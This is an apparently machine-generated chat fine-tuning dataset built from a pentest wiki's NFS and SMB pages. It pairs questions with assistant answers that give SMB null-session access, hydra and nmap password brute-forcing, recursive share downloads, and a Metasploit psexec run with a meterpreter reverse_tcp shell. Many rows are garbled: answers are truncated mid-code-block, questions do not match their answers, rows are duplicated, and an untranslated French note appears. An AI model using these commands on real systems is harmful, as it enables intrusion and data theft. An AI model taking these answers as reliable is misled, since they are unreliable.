specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out 🛠️ NFS - no_root_squash during a pentest?"}, {"role": "assistant", "content": "Root squashing is a configuration that prevents remote root users to get a root access on the mounted NFS volume. Enabled by default remote root users are assigned as _nfsnobody ,_ which is a role that has the least local privileges.\n\nAlternatively \"no_root_squash\" parameter turns off this configuration and gives to the remote user, root access to the NFS volume.\n\nhttps://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out 🛠️ NFS - no_root_squash during a pentest?", "response": "Root squashing is a configuration that prevents remote root users to get a root access on the mounted NFS volume. Enabled by default remote root users are assigned as _nfsnobody ,_ which is a role that has the least local privileges.\n\nAlternatively \"no_root_squash\" parameter turns off this configuration and gives to the remote user, root access to the NFS volume.\n\nhttps://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe", "metadata": {"corpus_index": 1513, "category": "privilege_escalation", "source_file": "docs/src/infra/protocols/nfs.md", "page_title": "🛠️ NFS", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about 🛠️ SMB - Theory"}, {"role": "assistant", "content": "SMB (Server Message Block) is a protocol running on port 445/tcp. It is used to share access to files, printers and serial ports on a network\n\nIn 1996 Microsoft releases a customized SMB they call CIFS (Common Internet File System). CIFS can sometimes be referred to as SMB1 (or SMBv1, SMB 1.0). In 2006, Microsoft introduced SMB2 (also referred to as SMB 2.0), a new version of the CIFS protocol. In 2012, Microsoft released SMB3 (a.k.a. SMB 3.0). As of 2020, most systems use SMB 2.0 or above.\n\nIn short, SMB is the protocol, CIFS is an old dialect of SMB, and Samba is the Linux/UNIX-like implementation of the SMB protocol (see this)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about 🛠️ SMB - Theory", "response": "SMB (Server Message Block) is a protocol running on port 445/tcp. It is used to share access to files, printers and serial ports on a network\n\nIn 1996 Microsoft releases a customized SMB they call CIFS (Common Internet File System). CIFS can sometimes be referred to as SMB1 (or SMBv1, SMB 1.0). In 2006, Microsoft introduced SMB2 (also referred to as SMB 2.0), a new version of the CIFS protocol. In 2012, Microsoft released SMB3 (a.k.a. SMB 3.0). As of 2020, most systems use SMB 2.0 or above.\n\nIn short, SMB is the protocol, CIFS is an old dialect of SMB, and Samba is the Linux/UNIX-like implementation of the SMB protocol (see this).", "metadata": {"corpus_index": 1514, "category": "network", "source_file": "docs/src/infra/protocols/smb.md", "page_title": "🛠️ SMB", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out 🛠️ SMB - Theory during a pentest?"}, {"role": "assistant", "content": "SMB (Server Message Block) is a protocol running on port 445/tcp. It is used to share access to files, printers and serial ports on a network\n\nIn 1996 Microsoft releases a customized SMB they call CIFS (Common Internet File System). CIFS can sometimes be referred to as SMB1 (or SMBv1, SMB 1.0). In 2006, Microsoft introduced SMB2 (also referred to as SMB 2.0), a new version of the CIFS protocol. In 2012, Microsoft released SMB3 (a.k.a. SMB 3.0). As of 2020, most systems use SMB 2.0 or above.\n\nIn short, SMB is the protocol, CIFS is an old dialect of SMB, and Samba is the Linux/UNIX-like implementation of the SMB protocol (see this)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out 🛠️ SMB - Theory during a pentest?", "response": "SMB (Server Message Block) is a protocol running on port 445/tcp. It is used to share access to files, printers and serial ports on a network\n\nIn 1996 Microsoft releases a customized SMB they call CIFS (Common Internet File System). CIFS can sometimes be referred to as SMB1 (or SMBv1, SMB 1.0). In 2006, Microsoft introduced SMB2 (also referred to as SMB 2.0), a new version of the CIFS protocol. In 2012, Microsoft released SMB3 (a.k.a. SMB 3.0). As of 2020, most systems use SMB 2.0 or above.\n\nIn short, SMB is the protocol, CIFS is an old dialect of SMB, and Samba is the Linux/UNIX-like implementation of the SMB protocol (see this).", "metadata": {"corpus_index": 1514, "category": "network", "source_file": "docs/src/infra/protocols/smb.md", "page_title": "🛠️ SMB", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about 🛠️ SMB - Null session"}, {"role": "assistant", "content": "The null session, if not disabled, allows for anonymous/guest access to a network resource when using no credentials\n\n::: tabs\n\n=== UNIX-like\n\nTools like smbclient (C) and smbmap (Python) can be used to access SMB shares with null sessions. Null credentials do not have to be explicitly set in this case.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about 🛠️ SMB - Null session", "response": "The null session, if not disabled, allows for anonymous/guest access to a network resource when using no credentials\n\n::: tabs\n\n=== UNIX-like\n\nTools like smbclient (C) and smbmap (Python) can be used to access SMB shares with null sessions. Null credentials do not have to be explicitly set in this case.\n\n```bash", "metadata": {"corpus_index": 1515, "category": "network", "source_file": "docs/src/infra/protocols/smb.md", "page_title": "🛠️ SMB", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out 🛠️ SMB - Null session during a pentest?"}, {"role": "assistant", "content": "The null session, if not disabled, allows for anonymous/guest access to a network resource when using no credentials\n\n::: tabs\n\n=== UNIX-like\n\nTools like smbclient (C) and smbmap (Python) can be used to access SMB shares with null sessions. Null credentials do not have to be explicitly set in this case.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out 🛠️ SMB - Null session during a pentest?", "response": "The null session, if not disabled, allows for anonymous/guest access to a network resource when using no credentials\n\n::: tabs\n\n=== UNIX-like\n\nTools like smbclient (C) and smbmap (Python) can be used to access SMB shares with null sessions. Null credentials do not have to be explicitly set in this case.\n\n```bash", "metadata": {"corpus_index": 1515, "category": "network", "source_file": "docs/src/infra/protocols/smb.md", "page_title": "🛠️ SMB", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about List shares (explicit null creds)"}, {"role": "assistant", "content": "smbclient --user ''%'' --list //$IP\nsmbmap -u '' -p '' -H $IP"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about List shares (explicit null creds)", "response": "smbclient --user ''%'' --list //$IP\nsmbmap -u '' -p '' -H $IP", "metadata": {"corpus_index": 1516, "category": "network", "source_file": "docs/src/infra/protocols/smb.md", "page_title": "🛠️ SMB", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for List shares (explicit null creds)?"}, {"role": "assistant", "content": "smbclient --user ''%'' --list //$IP\nsmbmap -u '' -p '' -H $IP"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for List shares (explicit null creds)?", "response": "smbclient --user ''%'' --list //$IP\nsmbmap -u '' -p '' -H $IP", "metadata": {"corpus_index": 1516, "category": "network", "source_file": "docs/src/infra/protocols/smb.md", "page_title": "🛠️ SMB", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Open an interactive session to operate on a specific share?"}, {"role": "assistant", "content": "smbclient //$IP/$SHARE_NAME\n``\n\nNetExec (Python) can be used to test for null session on multiple hosts.\n\n`bash\nnetexec smb $TARGETS -u '' -p '' --shares\n`\n\n=== Windows\n\nThe net cmdlet can be used to natively interact with SMB shares and explicitly set null credentials.\n\n> [!CAUTION]\n> If null credentials are not explicitly set, Windows will natively use implicit credentials (e.g. Kerberos tickets in cache, logged on user creds or computer account)\n\n`bash\nnet use \\\\$IP\\$SHARE_NAME '' /user:''\n``\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Open an interactive session to operate on a specific share?", "response": "smbclient //$IP/$SHARE_NAME\n``\n\nNetExec (Python) can be used to test for null session on multiple hosts.\n\n`bash\nnetexec smb $TARGETS -u '' -p '' --shares\n`\n\n=== Windows\n\nThe net cmdlet can be used to natively interact with SMB shares and explicitly set null credentials.\n\n> [!CAUTION]\n> If null credentials are not explicitly set, Windows will natively use implicit credentials (e.g. Kerberos tickets in cache, logged on user creds or computer account)\n\n`bash\nnet use \\\\$IP\\$SHARE_NAME '' /user:''\n``\n\n:::", "metadata": {"corpus_index": 1517, "category": "network", "source_file": "docs/src/infra/protocols/smb.md", "page_title": "🛠️ SMB", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Open an interactive session to operate on a specific share?"}, {"role": "assistant", "content": "smbclient //$IP/$SHARE_NAME\n``\n\nNetExec (Python) can be used to test for null session on multiple hosts.\n\n`bash\nnetexec smb $TARGETS -u '' -p '' --shares\n`\n\n=== Windows\n\nThe net cmdlet can be used to natively interact with SMB shares and explicitly set null credentials.\n\n> [!CAUTION]\n> If null credentials are not explicitly set, Windows will natively use implicit credentials (e.g. Kerberos tickets in cache, logged on user creds or computer account)\n\n`bash\nnet use \\\\$IP\\$SHARE_NAME '' /user:''\n``\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Open an interactive session to operate on a specific share?", "response": "smbclient //$IP/$SHARE_NAME\n``\n\nNetExec (Python) can be used to test for null session on multiple hosts.\n\n`bash\nnetexec smb $TARGETS -u '' -p '' --shares\n`\n\n=== Windows\n\nThe net cmdlet can be used to natively interact with SMB shares and explicitly set null credentials.\n\n> [!CAUTION]\n> If null credentials are not explicitly set, Windows will natively use implicit credentials (e.g. Kerberos tickets in cache, logged on user creds or computer account)\n\n`bash\nnet use \\\\$IP\\$SHARE_NAME '' /user:''\n``\n\n:::", "metadata": {"corpus_index": 1517, "category": "network", "source_file": "docs/src/infra/protocols/smb.md", "page_title": "🛠️ SMB", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Open an interactive session to operate on a specific share?"}, {"role": "assistant", "content": "[NetExec](https://github.com/Pennyw0rth/NetExec) (Python) can be used to test for null session on multiple hosts."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Open an interactive session to operate on a specific share?", "response": "[NetExec](https://github.com/Pennyw0rth/NetExec) (Python) can be used to test for null session on multiple hosts.", "metadata": {"corpus_index": 1518, "category": "network", "source_file": "docs/src/infra/protocols/smb.md", "page_title": "🛠️ SMB", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `[NetExec](https://github.com/Pennyw0rth/NetExec) (Python) can be used to test for null session on multiple hosts.`?"}, {"role": "assistant", "content": "This command is used for open an interactive session to operate on a specific share. Open an interactive session to operate on a specific share"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `[NetExec](https://github.com/Pennyw0rth/NetExec) (Python) can be used to test for null session on multiple hosts.`?", "response": "This command is used for open an interactive session to operate on a specific share. Open an interactive session to operate on a specific share", "metadata": {"corpus_index": 1518, "category": "network", "source_file": "docs/src/infra/protocols/smb.md", "page_title": "🛠️ SMB", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Open an interactive session to operate on a specific share"}, {"role": "assistant", "content": "=== Windows\n\nThe `net` cmdlet can be used to natively interact with SMB shares and explicitly set null credentials.\n\n> [!CAUTION]\n> If null credentials are not explicitly set, Windows will natively use implicit credentials (e.g. Kerberos tickets in cache, logged on user creds or computer account)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Open an interactive session to operate on a specific share", "response": "=== Windows\n\nThe `net` cmdlet can be used to natively interact with SMB shares and explicitly set null credentials.\n\n> [!CAUTION]\n> If null credentials are not explicitly set, Windows will natively use implicit credentials (e.g. Kerberos tickets in cache, logged on user creds or computer account)", "metadata": {"corpus_index": 1519, "category": "network", "source_file": "docs/src/infra/protocols/smb.md", "page_title": "🛠️ SMB", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== Windows`?"}, {"role": "assistant", "content": "This command is used for open an interactive session to operate on a specific share. Open an interactive session to operate on a specific share"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== Windows`?", "response": "This command is used for open an interactive session to operate on a specific share. Open an interactive session to operate on a specific share", "metadata": {"corpus_index": 1519, "category": "network", "source_file": "docs/src/infra/protocols/smb.md", "page_title": "🛠️ SMB", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is 🛠️ SMB - Bruteforce?"}, {"role": "assistant", "content": "Tools like hydra, metasploit or nmap can be used to operate authentication bruteforce attacks.\n\n> [!WARNING]\n> In addition to not being stealthy at all, and depending on the password policy rules in place, bruteforcing authentication could lead to accounts getting locked out when reaching maximum allowed tries.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is 🛠️ SMB - Bruteforce?", "response": "Tools like hydra, metasploit or nmap can be used to operate authentication bruteforce attacks.\n\n> [!WARNING]\n> In addition to not being stealthy at all, and depending on the password policy rules in place, bruteforcing authentication could lead to accounts getting locked out when reaching maximum allowed tries.\n\n```bash", "metadata": {"corpus_index": 1520, "category": "network", "source_file": "docs/src/infra/protocols/smb.md", "page_title": "🛠️ SMB", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do 🛠️ SMB - Bruteforce"}, {"role": "assistant", "content": "Tools like hydra, metasploit or nmap can be used to operate authentication bruteforce attacks.\n\n> [!WARNING]\n> In addition to not being stealthy at all, and depending on the password policy rules in place, bruteforcing authentication could lead to accounts getting locked out when reaching maximum allowed tries.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do 🛠️ SMB - Bruteforce", "response": "Tools like hydra, metasploit or nmap can be used to operate authentication bruteforce attacks.\n\n> [!WARNING]\n> In addition to not being stealthy at all, and depending on the password policy rules in place, bruteforcing authentication could lead to accounts getting locked out when reaching maximum allowed tries.\n\n```bash", "metadata": {"corpus_index": 1520, "category": "network", "source_file": "docs/src/infra/protocols/smb.md", "page_title": "🛠️ SMB", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain hydra"}, {"role": "assistant", "content": "hydra -L usernames.txt -P passwords.txt $IP -V -f smb"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain hydra", "response": "hydra -L usernames.txt -P passwords.txt $IP -V -f smb", "metadata": {"corpus_index": 1521, "category": "network", "source_file": "docs/src/infra/protocols/smb.md", "page_title": "🛠️ SMB", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do hydra"}, {"role": "assistant", "content": "hydra -L usernames.txt -P passwords.txt $IP -V -f smb"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do hydra", "response": "hydra -L usernames.txt -P passwords.txt $IP -V -f smb", "metadata": {"corpus_index": 1521, "category": "network", "source_file": "docs/src/infra/protocols/smb.md", "page_title": "🛠️ SMB", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain nmap"}, {"role": "assistant", "content": "nmap --script smb-brute -p 445 $IP\n```\n\nValid credentials can then be used to list accessible shares and enumerate the contents of the shares the account has access to."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain nmap", "response": "nmap --script smb-brute -p 445 $IP\n```\n\nValid credentials can then be used to list accessible shares and enumerate the contents of the shares the account has access to.", "metadata": {"corpus_index": 1522, "category": "network", "source_file": "docs/src/infra/protocols/smb.md", "page_title": "🛠️ SMB", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out nmap during a pentest?"}, {"role": "assistant", "content": "nmap --script smb-brute -p 445 $IP\n```\n\nValid credentials can then be used to list accessible shares and enumerate the contents of the shares the account has access to."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out nmap during a pentest?", "response": "nmap --script smb-brute -p 445 $IP\n```\n\nValid credentials can then be used to list accessible shares and enumerate the contents of the shares the account has access to.", "metadata": {"corpus_index": 1522, "category": "network", "source_file": "docs/src/infra/protocols/smb.md", "page_title": "🛠️ SMB", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about 🛠️ SMB - Data exfiltration?"}, {"role": "assistant", "content": "Tools like smbclient and NetExec can be used to recursively download a SMB share's content.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about 🛠️ SMB - Data exfiltration?", "response": "Tools like smbclient and NetExec can be used to recursively download a SMB share's content.\n\n```bash", "metadata": {"corpus_index": 1523, "category": "network", "source_file": "docs/src/infra/protocols/smb.md", "page_title": "🛠️ SMB", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out 🛠️ SMB - Data exfiltration during a pentest?"}, {"role": "assistant", "content": "Tools like smbclient and NetExec can be used to recursively download a SMB share's content.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out 🛠️ SMB - Data exfiltration during a pentest?", "response": "Tools like smbclient and NetExec can be used to recursively download a SMB share's content.\n\n```bash", "metadata": {"corpus_index": 1523, "category": "network", "source_file": "docs/src/infra/protocols/smb.md", "page_title": "🛠️ SMB", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about With netexec?"}, {"role": "assistant", "content": "netexec smb $TARGETS -u $USERNAME -p $PASSWORD -M spider_plus -o READ_ONLY=False\n```"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about With netexec?", "response": "netexec smb $TARGETS -u $USERNAME -p $PASSWORD -M spider_plus -o READ_ONLY=False\n```", "metadata": {"corpus_index": 1524, "category": "network", "source_file": "docs/src/infra/protocols/smb.md", "page_title": "🛠️ SMB", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through With netexec"}, {"role": "assistant", "content": "netexec smb $TARGETS -u $USERNAME -p $PASSWORD -M spider_plus -o READ_ONLY=False\n```"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through With netexec", "response": "netexec smb $TARGETS -u $USERNAME -p $PASSWORD -M spider_plus -o READ_ONLY=False\n```", "metadata": {"corpus_index": 1524, "category": "network", "source_file": "docs/src/infra/protocols/smb.md", "page_title": "🛠️ SMB", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about 🛠️ SMB - 🛠️ Authenticated RCE?"}, {"role": "assistant", "content": "PSExec exploit module runs on the same principle as the PSExec Windows utility. The exploit embeds a payload into an executable, upload it into the Admin$ share. It then calls the Service Control Manager to approximately start a new rundll32.exe process that will execute our malicious executable.\n\n``\nmsf > use exploit/windows/smb/psexec\nmsf exploit(psexec) > set payload windows/meterpreter/reverse_tcp\nmsf exploit(psexec) > show options\nModule options:\n\n Name Current Setting Required Description\n ---- --------------- -------- -----------\n RHOST 192.168.57.131 yes The target address\n RPORT 445 yes Set the SMB service port\n SMBPass no The password for the specified username\n SMBUser Administrator yes The username to authenticate as\n`\n\n> [!CAUTION]\n> Privileged user credentials required.\n\n> [!CAUTION]\n> File uploading, creating, starting, stopping, deletion of services makes it really noisy.\n\nSmbexec works like Psexec, but instead of trying to execute an uploaded executable inside the share, it will try to use directly the binaries _cmd.exe/powershell.exe_. The exploit create an arbitrary service with the _Service File Name_ attribute set to a command string to execute. It echoes the command to be executed to a .bat file, execute it and delete it.\n\nThe exploit then get the output of the command via Smb and displays the content. For every command, a new service is created.\n\nhttps://github.com/SecureAuthCorp/impacket/blob/master/examples/smbexec.py\n\n> [!TIP]\n> %COMSPEC% is the environment variable that generaly points to the command line interpreter. (_cmd.exe, powershell.exe_...)\n\n> [!TIP]\n> The purpose of using /Q option of cmd is to stop displaying output. (je crois que ça veut dire /quiet à vérifier)\n\n> [!CAUTION]\n> Prioritize using Smbexec when you detect a strong AV, cmd.exe`is a trusted component of the operating system.\n\n> [!CAUTION]\n> Privileged user credentials required.\n\nWindows Management Instrumentation is a subsystem of PowerShell that gives high privileged "}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about 🛠️ SMB - 🛠️ Authenticated RCE?", "response": "PSExec exploit module runs on the same principle as the PSExec Windows utility. The exploit embeds a payload into an executable, upload it into the Admin$ share. It then calls the Service Control Manager to approximately start a new rundll32.exe process that will execute our malicious executable.\n\n``\nmsf > use exploit/windows/smb/psexec\nmsf exploit(psexec) > set payload windows/meterpreter/reverse_tcp\nmsf exploit(psexec) > show options\nModule options:\n\n Name Current Setting Required Description\n ---- --------------- -------- -----------\n RHOST 192.168.57.131 yes The target address\n RPORT 445 yes Set the SMB service port\n SMBPass no The password for the specified username\n SMBUser Administrator yes The username to authenticate as\n`\n\n> [!CAUTION]\n> Privileged user credentials required.\n\n> [!CAUTION]\n> File uploading, creating, starting, stopping, deletion of services makes it really noisy.\n\nSmbexec works like Psexec, but instead of trying to execute an uploaded executable inside the share, it will try to use directly the binaries _cmd.exe/powershell.exe_. The exploit create an arbitrary service with the _Service File Name_ attribute set to a command string to execute. It echoes the command to be executed to a .bat file, execute it and delete it.\n\nThe exploit then get the output of the command via Smb and displays the content. For every command, a new service is created.\n\nhttps://github.com/SecureAuthCorp/impacket/blob/master/examples/smbexec.py\n\n> [!TIP]\n> %COMSPEC% is the environment variable that generaly points to the command line interpreter. (_cmd.exe, powershell.exe_...)\n\n> [!TIP]\n> The purpose of using /Q option of cmd is to stop displaying output. (je crois que ça veut dire /quiet à vérifier)\n\n> [!CAUTION]\n> Prioritize using Smbexec when you detect a strong AV, cmd.exe`is a trusted component of the operating system.\n\n> [!CAUTION]\n> Privileged user credentials required.\n\nWindows Management Instrumentation is a subsystem of PowerShell that gives high privileged ", "metadata": {"corpus_index": 1525, "category": "network", "source_file": "docs/src/infra/protocols/smb.md", "page_title": "🛠️ SMB", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through 🛠️ SMB - 🛠️ Authenticated RCE"}, {"role": "assistant", "content": "PSExec exploit module runs on the same principle as the PSExec Windows utility. The exploit embeds a payload into an executable, upload it into the Admin$ share. It then calls the Service Control Manager to approximately start a new rundll32.exe process that will execute our malicious executable.\n\n``\nmsf > use exploit/windows/smb/psexec\nmsf exploit(psexec) > set payload windows/meterpreter/reverse_tcp\nmsf exploit(psexec) > show options\nModule options:\n\n Name Current Setting Required Description\n ---- --------------- -------- -----------\n RHOST 192.168.57.131 yes The target address\n RPORT 445 yes Set the SMB service port\n SMBPass no The password for the specified username\n SMBUser Administrator yes The username to authenticate as\n`\n\n> [!CAUTION]\n> Privileged user credentials required.\n\n> [!CAUTION]\n> File uploading, creating, starting, stopping, deletion of services makes it really noisy.\n\nSmbexec works like Psexec, but instead of trying to execute an uploaded executable inside the share, it will try to use directly the binaries _cmd.exe/powershell.exe_. The exploit create an arbitrary service with the _Service File Name_ attribute set to a command string to execute. It echoes the command to be executed to a .bat file, execute it and delete it.\n\nThe exploit then get 